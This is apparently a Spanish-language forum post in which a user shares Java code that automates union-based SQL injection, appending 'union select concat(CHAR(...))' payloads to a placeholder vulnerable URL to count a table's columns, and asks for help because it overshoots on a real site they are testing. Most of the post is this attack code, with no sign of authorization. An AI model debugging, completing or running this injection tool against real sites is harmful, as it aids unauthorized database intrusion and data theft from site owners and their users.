Hola, pasa que escribí un script que deberia encontrar una palabra dentro de un codigo :S aqui esta el code:
Código:
//Main.ask = http://www.sitiovulnerable.com/archivo.php?asdf=
String new_url = Main.ask+"-999 union select ";
boolean shit_found = false;
System.out.println("Intentando...\n ");
for(int i=0;i<=proximo;i++){
new_url = new_url+"concat(CHAR("+ux_1+"))";
System.out.println("Intentando con "+i+" columnas. "+new_url);
URL next_url = new URL(new_url);
//Una vez agregada la palabra se procederá a analizar
BufferedReader try_url = new BufferedReader(new InputStreamReader(next_url.openStream()));
String da_html;
while((da_html = try_url.readLine()) != null){
if(da_html.contains("<asdf>")){
System.out.println("La tabla posee "+i+" columnas. Procediendo...\n");
Main.cantidad_columnas = i;
shit_found = true;
break;
}
}
new_url = new_url+",";
}
if(shit_found == false){
System.out.println("No se pudieron encontrar las columnas :/\n");
System.exit(0);
}
pero una en el sitio que lo estoy probando tengo claro que tiene 17 columnas la tabla :/
y se pasa de largo :(
tecnicamente la variable de la URL ke se carga no es la ke deberia ser, pero no encuentro el motivo
ojala me puedan ayudar
gracias, saludos.